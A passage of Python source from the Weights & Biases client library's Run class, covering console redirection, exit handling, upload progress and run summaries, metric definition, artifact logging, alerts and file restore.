wandb.termlog(version_str)
wandb.termlog(
"{} {}".format(run_state_str, click.style(run_name, fg="yellow"))
)
emojis = dict(star="", broom="", rocket="")
if platform.system() != "Windows" and is_unicode_safe(sys.stdout):
emojis = dict(star="⭐️", broom="🧹", rocket="🚀")
if not self._quiet:
wandb.termlog(
"{} View project at {}".format(
emojis.get("star", ""),
click.style(project_url, underline=True, fg="blue"),
)
)
if sweep_url:
wandb.termlog(
"{} View sweep at {}".format(
emojis.get("broom", ""),
click.style(sweep_url, underline=True, fg="blue"),
)
)
wandb.termlog(
"{} View run at {}".format(
emojis.get("rocket", ""),
click.style(run_url, underline=True, fg="blue"),
)
)
if not self._quiet:
wandb.termlog(dir_str)
if not self._settings._offline:
wandb.termlog("Run `wandb offline` to turn off syncing.")
api = internal.Api()
if api.settings().get("anonymous") == "true":
wandb.termwarn(
"Do NOT share these links with anyone. They can be used to claim your runs."
)
print("")
def _redirect(
self,
stdout_slave_fd: Optional[int],
stderr_slave_fd: Optional[int],
console: SettingsConsole = None,
) -> None:
if console is None:
console = self._settings._console
logger.info("redirect: %s", console)
out_redir: redirect.RedirectBase
err_redir: redirect.RedirectBase
if console == SettingsConsole.REDIRECT:
logger.info("Redirecting console.")
out_redir = redirect.Redirect(
src="stdout",
cbs=[
lambda data: self._redirect_cb("stdout", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
err_redir = redirect.Redirect(
src="stderr",
cbs=[
lambda data: self._redirect_cb("stderr", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
if os.name == "nt":
def wrap_fallback() -> None:
if self._out_redir:
self._out_redir.uninstall()
if self._err_redir:
self._err_redir.uninstall()
msg = (
"Tensorflow detected. Stream redirection is not supported "
"on Windows when tensorflow is imported. Falling back to "
"wrapping stdout/err."
)
wandb.termlog(msg)
self._redirect(None, None, console=SettingsConsole.WRAP)
add_import_hook("tensorflow", wrap_fallback)
elif console == SettingsConsole.WRAP:
logger.info("Wrapping output streams.")
out_redir = redirect.StreamWrapper(
src="stdout",
cbs=[
lambda data: self._redirect_cb("stdout", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
err_redir = redirect.StreamWrapper(
src="stderr",
cbs=[
lambda data: self._redirect_cb("stderr", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
elif console == SettingsConsole.OFF:
return
else:
raise ValueError("unhandled console")
try:
out_redir.install()
err_redir.install()
self._out_redir = out_redir
self._err_redir = err_redir
logger.info("Redirects installed.")
except Exception as e:
print(e)
logger.error("Failed to redirect.", exc_info=e)
return
def _restore(self) -> None:
logger.info("restore")
# TODO(jhr): drain and shutdown all threads
if self._use_redirect:
if self._out_redir:
self._out_redir.uninstall()
if self._err_redir:
self._err_redir.uninstall()
return
if self.stdout_redirector:
self.stdout_redirector.restore()
if self.stderr_redirector:
self.stderr_redirector.restore()
if self._save_stdout:
sys.stdout = self._save_stdout
if self._save_stderr:
sys.stderr = self._save_stderr
logger.info("restore done")
def _atexit_cleanup(self, exit_code: int = None) -> None:
if self._backend is None:
logger.warning("process exited without backend configured")
return
if self._atexit_cleanup_called:
return
self._atexit_cleanup_called = True
exit_code = exit_code or self._hooks.exit_code if self._hooks else 0
logger.info("got exitcode: %d", exit_code)
if exit_code == 0:
# Cleanup our resume file on a clean exit
if os.path.exists(self._settings.resume_fname):
os.remove(self._settings.resume_fname)
self._exit_code = exit_code
try:
self._on_finish()
except KeyboardInterrupt as ki:
if wandb.wandb_agent._is_running():
raise ki
wandb.termerror("Control-C detected -- Run data was not synced")
if ipython._get_python_type() == "python":
os._exit(-1)
except Exception as e:
self._console_stop()
self._backend.cleanup()
logger.error("Problem finishing run", exc_info=e)
wandb.termerror("Problem finishing run")
traceback.print_exception(*sys.exc_info())
if ipython._get_python_type() == "python":
os._exit(-1)
else:
# if silent, skip this as it is used to output stuff
if self._settings._silent:
return
self._on_final()
def _console_start(self) -> None:
logger.info("atexit reg")
self._hooks = ExitHooks()
self._hooks.hook()
manager = self._wl and self._wl._get_manager()
if not manager:
# NB: manager will perform atexit hook like behavior for outstanding runs
atexit.register(lambda: self._atexit_cleanup())
if self._use_redirect:
# setup fake callback
self._redirect_cb = self._console_callback
output_log_path = os.path.join(self.dir, filenames.OUTPUT_FNAME)
self._output_writer = filesystem.CRDedupedFile(open(output_log_path, "wb"))
self._redirect(self._stdout_slave_fd, self._stderr_slave_fd)
def _console_stop(self) -> None:
self._restore()
if self._output_writer:
self._output_writer.close()
self._output_writer = None
def _on_init(self) -> None:
self._show_version_info()
def _on_start(self) -> None:
# TODO: make offline mode in jupyter use HTML
if self._settings._offline and not self._quiet:
message = (
"W&B syncing is set to `offline` in this directory. ",
"Run `wandb online` or set WANDB_MODE=online to enable cloud syncing.",
)
if self._settings._jupyter and ipython.in_jupyter():
ipython.display_html("<br/>\n".join(message))
else:
for m in message:
wandb.termlog(m)
if self._settings.save_code and self._settings.code_dir is not None:
self.log_code(self._settings.code_dir)
if self._run_obj and not self._settings._silent:
self._display_run()
# TODO(wandb-service) RunStatusChecker not supported yet (WB-7352)
if self._backend and self._backend.interface and not self._settings._offline:
self._run_status_checker = RunStatusChecker(self._backend.interface)
self._console_start()
def _pusher_print_status(
self,
progress: FilePusherStats,
prefix: bool = True,
done: Optional[bool] = False,
) -> None:
if self._settings._offline:
return
line = " %.2fMB of %.2fMB uploaded (%.2fMB deduped)\r" % (
progress.uploaded_bytes / 1048576.0,
progress.total_bytes / 1048576.0,
progress.deduped_bytes / 1048576.0,
)
if self._jupyter_progress:
percent_done: float
if progress.total_bytes == 0:
percent_done = 1
else:
percent_done = progress.uploaded_bytes / progress.total_bytes
self._jupyter_progress.update(percent_done, line)
if done:
self._jupyter_progress.close()
elif not self._settings._jupyter:
spinner_states = ["-", "\\", "|", "/"]
line = spinner_states[self._progress_step % 4] + line
self._progress_step += 1
wandb.termlog(line, newline=False, prefix=prefix)
if done:
dedupe_fraction = (
progress.deduped_bytes / float(progress.total_bytes)
if progress.total_bytes > 0
else 0
)
if dedupe_fraction > 0.01:
wandb.termlog(
"W&B sync reduced upload amount by %.1f%% "
% (dedupe_fraction * 100),
prefix=prefix,
)
# clear progress line.
wandb.termlog(" " * 79, prefix=prefix)
def _on_finish_progress(self, progress: FilePusherStats, done: bool = None) -> None:
self._pusher_print_status(progress, done=done)
def _wait_for_finish(self) -> PollExitResponse:
while True:
if self._backend and self._backend.interface:
poll_exit_resp = self._backend.interface.communicate_poll_exit()
logger.info("got exit ret: %s", poll_exit_resp)
if poll_exit_resp:
done = poll_exit_resp.done
pusher_stats = poll_exit_resp.pusher_stats
if pusher_stats:
self._on_finish_progress(pusher_stats, done)
if done:
return poll_exit_resp
time.sleep(0.1)
def _on_finish(self) -> None:
trigger.call("on_finished")
# populate final import telemetry
with telemetry.context(run=self) as tel:
self._telemetry_imports(tel.imports_finish)
if self._run_status_checker:
self._run_status_checker.stop()
# make sure all uncommitted history is flushed
self.history._flush()
self._console_stop() # TODO: there's a race here with jupyter console logging
if not self._settings._silent:
as_html = self._settings._jupyter and ipython.in_jupyter()
if self._backend:
pid = self._backend._internal_pid
status_str = "Waiting for W&B process to finish, PID {}... ".format(pid)
if not self._exit_code:
status = "(success)."
if as_html:
status = f'<strong style="color:green">{status}</strong>'
status_str += status
else:
status = "(failed {}).".format(self._exit_code)
if as_html:
status = f'<strong style="color:red">{status}</strong>'
status_str += status
if not self._settings._offline:
status_str += " Press ctrl-c to abort syncing."
if as_html:
sep = "<br/>" if not self._quiet else ""
ipython.display_html(sep + status_str)
else:
print("")
wandb.termlog(status_str)
# telemetry could have changed, publish final data
if self._backend and self._backend.interface:
self._backend.interface._publish_telemetry(self._telemetry_obj)
# TODO: we need to handle catastrophic failure better
# some tests were timing out on sending exit for reasons not clear to me
if self._backend and self._backend.interface:
self._backend.interface.publish_exit(self._exit_code)
# Wait for data to be synced
self._poll_exit_response = self._wait_for_finish()
if self._backend and self._backend.interface:
ret = self._backend.interface.communicate_get_summary()
if ret:
self._final_summary = proto_util.dict_from_proto_list(ret.item)
if self._backend and self._backend.interface:
sampled = self._backend.interface.communicate_sampled_history()
if sampled:
d: Dict[str, Union[Sequence[int], Sequence[float]]] = {}
for item in sampled.item:
d[item.key] = (
item.values_float if item.values_float else item.values_int
)
self._sampled_history = d
if self._backend:
self._backend.cleanup()
if self._run_status_checker:
self._run_status_checker.join()
def _on_final(self) -> None:
as_html = self._settings._jupyter and ipython.in_jupyter()
if as_html:
lb = "<br/>\n"
else:
lb = "\n"
# check for warnings and errors, show log file locations
final_logs = ""
if self._reporter and not self._quiet:
warning_lines = self._reporter.warning_lines
if warning_lines:
final_logs += f"Warnings:{lb}"
for line in warning_lines:
final_logs += f"{line}{lb}"
if len(warning_lines) < self._reporter.warning_count:
final_logs += f"More warnings...{lb}"
error_lines = self._reporter.error_lines
if error_lines:
final_logs += f"Errors:{lb}"
for line in error_lines:
final_logs += f"{line}{lb}"
if len(error_lines) < self._reporter.error_count:
final_logs += f"More errors...{lb}"
if not self._quiet:
final_logs += self._append_details(final_logs, as_html)
if self._run_obj:
run_url = self._get_run_url()
run_name = self._get_run_name()
if as_html:
final_logs += 'Synced <strong style="color:{}">{}</strong>: <a href="{}" target="_blank">{}</a>{}'.format(
RUN_NAME_COLOR, run_name, run_url, run_url, lb
)
else:
final_logs += "Synced {}: {}{}".format(
click.style(run_name, fg="yellow"),
click.style(run_url, fg="blue"),
lb,
)
if self._settings._offline and not self._quiet:
final_logs += f"You can sync this run to the cloud by running:{lb}"
final_logs += click.style(
f"wandb sync {self._settings.sync_dir}{lb}", fg="yellow"
)
if not self._quiet and (self._settings.log_user or self._settings.log_internal):
log_dir = self._settings.log_user or self._settings.log_internal or "."
log_dir = log_dir.replace(os.getcwd(), ".")
if as_html:
log_dir = "<code>{}</code>".format(os.path.dirname(log_dir))
final_logs += "Find logs at: {}{}".format(log_dir, lb)
if as_html:
ipython.display_html(final_logs)
else:
wandb.termlog(final_logs)
if not self._quiet:
self._show_version_info(footer=True)
self._show_local_warning()
def _show_version_info(self, footer: bool = None) -> None:
package_problem = False
if self._deleted_version_message:
wandb.termerror(self._deleted_version_message)
package_problem = True
elif self._yanked_version_message:
wandb.termwarn(self._yanked_version_message)
package_problem = True
# only display upgrade message if packages are bad or in header
if not footer or package_problem:
if self._upgraded_version_message:
wandb.termlog(self._upgraded_version_message)
def _append_details(self, logs: str, as_html: bool = False) -> str:
if as_html:
logs += ipython.TABLE_STYLES
logs += '<div class="wandb-row"><div class="wandb-col">\n'
logs = self._append_history(logs, as_html)
if as_html:
logs += '</div><div class="wandb-col">\n'
logs = self._append_summary(logs, as_html)
if as_html:
logs += "</div></div>\n"
return self._append_files(logs, as_html)
def _append_summary(self, logs: str, as_html: bool = False) -> str:
if self._final_summary:
logger.info("rendering summary")
max_len = 0
summary_rows = []
for k, v in sorted(iteritems(self._final_summary)):
# arrays etc. might be too large. for now we just don't print them
if k.startswith("_"):
continue
if isinstance(v, string_types):
if len(v) >= 20:
v = v[:20] + "..."
summary_rows.append((k, v))
elif isinstance(v, numbers.Number):
if isinstance(v, float):
v = round(v, 5)
summary_rows.append((k, v))
else:
continue
max_len = max(max_len, len(k))
if not summary_rows:
return logs
if as_html:
summary_table = '<table class="wandb">'
for row in summary_rows:
summary_table += "<tr><td>{}</td><td>{}</td></tr>".format(*row)
summary_table += "</table>\n"
logs += "<h3>Run summary:</h3><br/>" + summary_table
else:
format_str = " {:>%s} {}" % max_len
summary_lines = "\n".join(
[format_str.format(k, v) for k, v in summary_rows]
)
logs += f"Run summary:\n{summary_lines}\n\n"
return logs
def _append_history(self, logs: str, as_html: bool = False) -> str:
if not self._sampled_history:
return logs
# Only print sparklines if the terminal is utf-8
if not is_unicode_safe(sys.stdout):
return logs
logger.info("rendering history")
max_len = 0
history_rows = []
for key in sorted(self._sampled_history):
if key.startswith("_"):
continue
vals = wandb.util.downsample(self._sampled_history[key], 40)
if any((not isinstance(v, numbers.Number) for v in vals)):
continue
line = sparkline.sparkify(vals)
history_rows.append((key, line))
max_len = max(max_len, len(key))
if not history_rows:
return logs
if as_html:
history_table = '<table class="wandb">'
for row in history_rows:
history_table += "<tr><td>{}</td><td>{}</td></tr>".format(*row)
history_table += "</table>"
logs += "<h3>Run history:</h3><br/>" + history_table + "<br/>"
else:
logs += "Run history:\n"
history_lines = ""
format_str = " {:>%s} {}\n" % max_len
for row in history_rows:
history_lines += format_str.format(*row)
logs += history_lines.rstrip() + "\n\n"
return logs
def _show_local_warning(self) -> None:
if not self._poll_exit_response or not self._poll_exit_response.local_info:
return
if self._settings._offline:
return
if self._settings.is_local:
local_info = self._poll_exit_response.local_info
latest_version, out_of_date = local_info.version, local_info.out_of_date
if out_of_date:
wandb.termwarn(
f"Upgrade to the {latest_version} version of W&B Local to get the latest features. Learn more: http://wandb.me/local-upgrade"
)
def _append_files(self, logs: str, as_html: bool = False) -> str:
if not self._poll_exit_response or not self._poll_exit_response.file_counts:
return logs
if self._settings._offline:
return logs
logger.info("logging synced files")
if self._settings._silent:
return logs
file_str = "Synced {} W&B file(s), {} media file(s), {} artifact file(s) and {} other file(s){}".format( # noqa:E501
self._poll_exit_response.file_counts.wandb_count,
self._poll_exit_response.file_counts.media_count,
self._poll_exit_response.file_counts.artifact_count,
self._poll_exit_response.file_counts.other_count,
"\n<br/>" if as_html else "\n",
)
logs += file_str
return logs
def _save_job_spec(self) -> None:
envdict = dict(python="python3.6", requirements=[],)
varsdict = {"WANDB_DISABLE_CODE": "True"}
source = dict(
git="git@github.com:wandb/examples.git", branch="master", commit="bbd8d23",
)
execdict = dict(
program="train.py",
directory="keras-cnn-fashion",
envvars=varsdict,
args=[],
)
configdict = (dict(self._config),)
artifactsdict = dict(dataset="v1",)
inputdict = dict(config=configdict, artifacts=artifactsdict,)
job_spec = {
"kind": "WandbJob",
"version": "v0",
"environment": envdict,
"source": source,
"exec": execdict,
"input": inputdict,
}
s = json.dumps(job_spec, indent=4)
spec_filename = filenames.JOBSPEC_FNAME
with open(spec_filename, "w") as f:
print(s, file=f)
self.save(spec_filename)
def define_metric(
self,
name: str,
step_metric: Union[str, wandb_metric.Metric, None] = None,
step_sync: bool = None,
hidden: bool = None,
summary: str = None,
goal: str = None,
overwrite: bool = None,
**kwargs: Any,
) -> wandb_metric.Metric:
"""Define metric properties which will later be logged with `wandb.log()`.
Arguments:
name: Name of the metric.
step_metric: Independent variable associated with the metric.
step_sync: Automatically add `step_metric` to history if needed.
Defaults to True if step_metric is specified.
hidden: Hide this metric from automatic plots.
summary: Specify aggregate metrics added to summary.
Supported aggregations: "min,max,mean,best,last,none"
Default aggregation is `copy`
Aggregation `best` defaults to `goal`==`minimize`
goal: Specify direction for optimizing the metric.
Supported directions: "minimize,maximize"
Returns:
A metric object is returned that can be further specified.
"""
if not name:
raise wandb.Error("define_metric() requires non-empty name argument")
for k in kwargs:
wandb.termwarn("Unhandled define_metric() arg: {}".format(k))
if isinstance(step_metric, wandb_metric.Metric):
step_metric = step_metric.name
for arg_name, arg_val, exp_type in (
("name", name, string_types),
("step_metric", step_metric, string_types),
("step_sync", step_sync, bool),
("hidden", hidden, bool),
("summary", summary, string_types),
("goal", goal, string_types),
("overwrite", overwrite, bool),
):
# NOTE: type checking is broken for isinstance and string_types
if arg_val is not None and not isinstance(arg_val, exp_type): # type: ignore
arg_type = type(arg_val).__name__
raise wandb.Error(
"Unhandled define_metric() arg: {} type: {}".format(
arg_name, arg_type
)
)
stripped = name[:-1] if name.endswith("*") else name
if "*" in stripped:
raise wandb.Error(
"Unhandled define_metric() arg: name (glob suffixes only): {}".format(
name
)
)
summary_ops: Optional[Sequence[str]] = None
if summary:
summary_items = [s.lower() for s in summary.split(",")]
summary_ops = []
valid = {"min", "max", "mean", "best", "last", "copy", "none"}
for i in summary_items:
if i not in valid:
raise wandb.Error(
"Unhandled define_metric() arg: summary op: {}".format(i)
)
summary_ops.append(i)
goal_cleaned: Optional[str] = None
if goal is not None:
goal_cleaned = goal[:3].lower()
valid_goal = {"min", "max"}
if goal_cleaned not in valid_goal:
raise wandb.Error(
"Unhandled define_metric() arg: goal: {}".format(goal)
)
m = wandb_metric.Metric(
name=name,
step_metric=step_metric,
step_sync=step_sync,
summary=summary_ops,
hidden=hidden,
goal=goal_cleaned,
overwrite=overwrite,
)
m._set_callback(self._metric_callback)
m._commit()
with telemetry.context(run=self) as tel:
tel.feature.metric = True
return m
# TODO(jhr): annotate this
def watch(self, models, criterion=None, log="gradients", log_freq=100, idx=None, log_graph=False) -> None: # type: ignore
wandb.watch(models, criterion, log, log_freq, idx, log_graph)
# TODO(jhr): annotate this
def unwatch(self, models=None) -> None: # type: ignore
wandb.unwatch(models=models)
def _swap_artifact_name(self, artifact_name: str, use_as: Optional[str]) -> str:
artifact_key_string = use_as or artifact_name
replacement_artifact_info = self._launch_artifact_mapping.get(
artifact_key_string
)
if replacement_artifact_info is not None:
new_name = replacement_artifact_info.get("name")
entity = replacement_artifact_info.get("entity")
project = replacement_artifact_info.get("project")
if new_name is None or entity is None or project is None:
raise ValueError(
"Misconfigured artifact in launch config. Must include name, project and entity keys."
)
return f"{entity}/{project}/{new_name}"
elif replacement_artifact_info is None and use_as is None:
wandb.termwarn(
f"Could not find {artifact_name} in launch artifact mapping. Searching for unique artifacts with sequence name: {artifact_name}"
)
sequence_name = artifact_name.split(":")[0].split("/")[-1]
unique_artifact_replacement_info = self._unique_launch_artifact_sequence_names.get(
sequence_name
)
if unique_artifact_replacement_info is not None:
new_name = unique_artifact_replacement_info.get("name")
entity = unique_artifact_replacement_info.get("entity")
project = unique_artifact_replacement_info.get("project")
if new_name is None or entity is None or project is None:
raise ValueError(
"Misconfigured artifact in launch config. Must include name, project and entity keys."
)
return f"{entity}/{project}/{new_name}"
else:
wandb.termwarn(
f"Could not find swappable artifact at key: {use_as}. Using {artifact_name}"
)
return artifact_name
wandb.termwarn(
f"Could not find {artifact_key_string} in launch artifact mapping. Using {artifact_name}"
)
return artifact_name
def _detach(self) -> None:
pass
# TODO(jhr): annotate this
def use_artifact(self, artifact_or_name, type=None, aliases=None, use_as=None): # type: ignore
"""Declare an artifact as an input to a run.
Call `download` or `file` on the returned object to get the contents locally.
Arguments:
artifact_or_name: (str or Artifact) An artifact name.
May be prefixed with entity/project/. Valid names
can be in the following forms:
- name:version
- name:alias
- digest
You can also pass an Artifact object created by calling `wandb.Artifact`
type: (str, optional) The type of artifact to use.
aliases: (list, optional) Aliases to apply to this artifact
use_as: (string, optional) Optional string indicating what purpose the artifact was used with. Will be shown in UI.
Returns:
An `Artifact` object.
"""
if self.offline:
raise TypeError("Cannot use artifact when in offline mode.")
if use_as:
if use_as in self._used_artifact_slots:
raise ValueError(
"Cannot call use_artifact with the same use_as argument more than once"
)
elif ":" in use_as or "/" in use_as:
raise ValueError("use_as cannot contain special characters ':' or '/'")
self._used_artifact_slots.append(use_as)
r = self._run_obj
api = internal.Api(default_settings={"entity": r.entity, "project": r.project})
api.set_current_run_id(self.id)
if isinstance(artifact_or_name, str):
if self._launch_artifact_mapping:
name = self._swap_artifact_name(artifact_or_name, use_as)
else:
name = artifact_or_name
public_api = self._public_api()
artifact = public_api.artifact(type=type, name=name)
if type is not None and type != artifact.type:
raise ValueError(
"Supplied type {} does not match type {} of artifact {}".format(
type, artifact.type, artifact.name
)
)
artifact._use_as = use_as or artifact_or_name
api.use_artifact(
artifact.id, use_as=use_as or artifact_or_name,
)
return artifact
else:
artifact = artifact_or_name
if aliases is None:
aliases = []
elif isinstance(aliases, str):
aliases = [aliases]
if isinstance(artifact_or_name, wandb.Artifact):
if use_as is not None:
wandb.termwarn(
"Indicating use_as is not supported when using an artifact with an instance of wandb.Artifact"
)
self._log_artifact(
artifact,
aliases=aliases,
is_user_created=True,
use_after_commit=True,
)
return artifact
elif isinstance(artifact, public.Artifact):
if self._launch_artifact_mapping is not None:
wandb.termwarn(
f"Swapping artifacts does not support swapping artifacts used as an instance of `public.Artifact`. Using {artifact.name}"
)
api.use_artifact(
artifact.id, use_as=use_as or artifact._use_as or artifact.name
)
return artifact
else:
raise ValueError(
'You must pass an artifact name (e.g. "pedestrian-dataset:v1"), an instance of wandb.Artifact, or wandb.Api().artifact() to use_artifact' # noqa: E501
)
def log_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
) -> wandb_artifacts.Artifact:
"""Declare an artifact as an output of a run.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
Returns:
An `Artifact` object.
"""
return self._log_artifact(
artifact_or_path, name=name, type=type, aliases=aliases
)
def upsert_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
distributed_id: Optional[str] = None,
) -> wandb_artifacts.Artifact:
"""Declare (or append to) a non-finalized artifact as output of a run.
Note that you must call run.finish_artifact() to finalize the artifact.
This is useful when distributed jobs need to all contribute to the same artifact.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
distributed_id: (string, optional) Unique string that all distributed jobs share. If None,
defaults to the run's group name.
Returns:
An `Artifact` object.
"""
if self.group == "" and distributed_id is None:
raise TypeError(
"Cannot upsert artifact unless run is in a group or distributed_id is provided"
)
if distributed_id is None:
distributed_id = self.group
return self._log_artifact(
artifact_or_path,
name=name,
type=type,
aliases=aliases,
distributed_id=distributed_id,
finalize=False,
)
def finish_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
distributed_id: Optional[str] = None,
) -> wandb_artifacts.Artifact:
"""Finishes a non-finalized artifact as output of a run.
Subsequent "upserts" with the same distributed ID will result in a new version.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
distributed_id: (string, optional) Unique string that all distributed jobs share. If None,
defaults to the run's group name.
Returns:
An `Artifact` object.
"""
if self.group == "" and distributed_id is None:
raise TypeError(
"Cannot finish artifact unless run is in a group or distributed_id is provided"
)
if distributed_id is None:
distributed_id = self.group
return self._log_artifact(
artifact_or_path,
name,
type,
aliases,
distributed_id=distributed_id,
finalize=True,
)
def _log_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
distributed_id: Optional[str] = None,
finalize: bool = True,
is_user_created: bool = False,
use_after_commit: bool = False,
) -> wandb_artifacts.Artifact:
api = internal.Api()
if api.settings().get("anonymous") == "true":
wandb.termwarn(
"Artifacts logged anonymously cannot be claimed and expire after 7 days."
)
if not finalize and distributed_id is None:
raise TypeError("Must provide distributed_id if artifact is not finalize")
if aliases is not None:
if any(invalid in alias for alias in aliases for invalid in ["/", ":"]):
raise ValueError(
"Aliases must not contain any of the following characters: /, :"
)
artifact, aliases = self._prepare_artifact(
artifact_or_path, name, type, aliases
)
artifact.distributed_id = distributed_id
self._assert_can_log_artifact(artifact)
if self._backend and self._backend.interface:
if not self._settings._offline:
future = self._backend.interface.communicate_artifact(
self,
artifact,
aliases,
finalize=finalize,
is_user_created=is_user_created,
use_after_commit=use_after_commit,
)
artifact._logged_artifact = _LazyArtifact(self._public_api(), future)
else:
self._backend.interface.publish_artifact(
self,
artifact,
aliases,
finalize=finalize,
is_user_created=is_user_created,
use_after_commit=use_after_commit,
)
elif self._internal_run_interface:
self._internal_run_interface.publish_artifact(
self,
artifact,
aliases,
finalize=finalize,
is_user_created=is_user_created,
use_after_commit=use_after_commit,
)
return artifact
def _public_api(self) -> PublicApi:
overrides = {"run": self.id}
run_obj = self._run_obj
if run_obj is not None:
overrides["entity"] = run_obj.entity
overrides["project"] = run_obj.project
return public.Api(overrides)
# TODO(jhr): annotate this
def _assert_can_log_artifact(self, artifact) -> None: # type: ignore
if not self._settings._offline:
try:
public_api = self._public_api()
expected_type = public.Artifact.expected_type(
public_api.client,
artifact.name,
public_api.settings["entity"],
public_api.settings["project"],
)
except requests.exceptions.RequestException:
# Just return early if there is a network error. This is
# ok, as this function is intended to help catch an invalid
# type early, but not a hard requirement for valid operation.
return
if expected_type is not None and artifact.type != expected_type:
raise ValueError(
"Expected artifact type {}, got {}".format(
expected_type, artifact.type
)
)
def _prepare_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
) -> Tuple[wandb_artifacts.Artifact, List[str]]:
aliases = aliases or ["latest"]
if isinstance(artifact_or_path, str):
if name is None:
name = "run-%s-%s" % (self.id, os.path.basename(artifact_or_path))
artifact = wandb.Artifact(name, type)
if os.path.isfile(artifact_or_path):
artifact.add_file(artifact_or_path)
elif os.path.isdir(artifact_or_path):
artifact.add_dir(artifact_or_path)
elif "://" in artifact_or_path:
artifact.add_reference(artifact_or_path)
else:
raise ValueError(
"path must be a file, directory or external"
"reference like s3://bucket/path"
)
else:
artifact = artifact_or_path
if not isinstance(artifact, wandb.Artifact):
raise ValueError(
"You must pass an instance of wandb.Artifact or a "
"valid file path to log_artifact"
)
if isinstance(aliases, str):
aliases = [aliases]
artifact.finalize()
return artifact, aliases
def alert(
self,
title: str,
text: str,
level: Union[str, "AlertLevel"] = None,
wait_duration: Union[int, float, timedelta, None] = None,
) -> None:
"""Launch an alert with the given title and text.
Arguments:
title: (str) The title of the alert, must be less than 64 characters long.
text: (str) The text body of the alert.
level: (str or wandb.AlertLevel, optional) The alert level to use, either: `INFO`, `WARN`, or `ERROR`.
wait_duration: (int, float, or timedelta, optional) The time to wait (in seconds) before sending another
alert with this title.
"""
level = level or wandb.AlertLevel.INFO
level_str: str = level.value if isinstance(level, wandb.AlertLevel) else level
if level_str not in {lev.value for lev in wandb.AlertLevel}:
raise ValueError("level must be one of 'INFO', 'WARN', or 'ERROR'")
wait_duration = wait_duration or timedelta(minutes=1)
if isinstance(wait_duration, int) or isinstance(wait_duration, float):
wait_duration = timedelta(seconds=wait_duration)
elif not callable(getattr(wait_duration, "total_seconds", None)):
raise ValueError(
"wait_duration must be an int, float, or datetime.timedelta"
)
wait_duration = int(wait_duration.total_seconds() * 1000)
if self._backend and self._backend.interface:
self._backend.interface.publish_alert(title, text, level_str, wait_duration)
def __enter__(self) -> "Run":
return self
def __exit__(
self,
exc_type: Type[BaseException],
exc_val: BaseException,
exc_tb: TracebackType,
) -> bool:
exit_code = 0 if exc_type is None else 1
self.finish(exit_code)
return exc_type is None
def mark_preempting(self) -> None:
"""Marks this run as preempting.
Also tells the internal process to immediately report this to server.
"""
if self._backend and self._backend.interface:
self._backend.interface.publish_preempting()
# We define this outside of the run context to support restoring before init
def restore(
name: str,
run_path: Optional[str] = None,
replace: bool = False,
root: Optional[str] = None,
) -> Union[None, TextIO]:
"""Downloads the specified file from cloud storage.
File is placed into the current directory or run directory.
By default will only download the file if it doesn't already exist.
Arguments:
name: the name of the file
run_path: optional path to a run to pull files from, i.e. `username/project_name/run_id`
if wandb.init has not been called, this is required.
replace: whether to download the file even if it already exists locally
root: the directory to download the file to. Defaults to the current
directory or the run directory if wandb.init was called.
Returns:
None if it can't find the file, otherwise a file object open for reading
Raises:
wandb.CommError: if we can't connect to the wandb backend
ValueError: if the file is not found or can't find run_path
"""
is_disabled = wandb.run is not None and wandb.run.disabled
run = None if is_disabled else wandb.run
if run_path is None:
if run is not None:
run_path = run.path
else:
raise ValueError(
"run_path required when calling wandb.restore before wandb.init"
)
if root is None:
if run is not None:
root = run.dir
api = public.Api()
api_run = api.run(run_path)
if root is None:
root = os.getcwd()
path = os.path.join(root, name)
if os.path.exists(path) and replace is False:
return open(path, "r")
if is_disabled:
return None
files = api_run.files([name])
if len(files) == 0:
return None
# if the file does not exist, the file has an md5 of 0
if files[0].md5 == "0":
raise ValueError("File {} not found in {}.".format(name, run_path or root))
return files[0].download(root=root, replace=True)
# propigate our doc string to the runs restore method
try:
Run.restore.__doc__ = restore.__doc__
# py2 doesn't let us set a doc string, just pass
except AttributeError:
pass
def finish(exit_code: int = None, quiet: bool = None) -> None:
"""Marks a run as finished, and finishes uploading all data.
This is used when creating multiple runs in the same process.
We automatically call this method when your script exits.
Arguments:
exit_code: Set to something other than 0 to mark a run as failed
quiet: Set to true to minimize log output
"""
if wandb.run:
wandb.run.finish(exit_code=exit_code, quiet=quiet)
# propagate our doc string to the runs restore method
try:
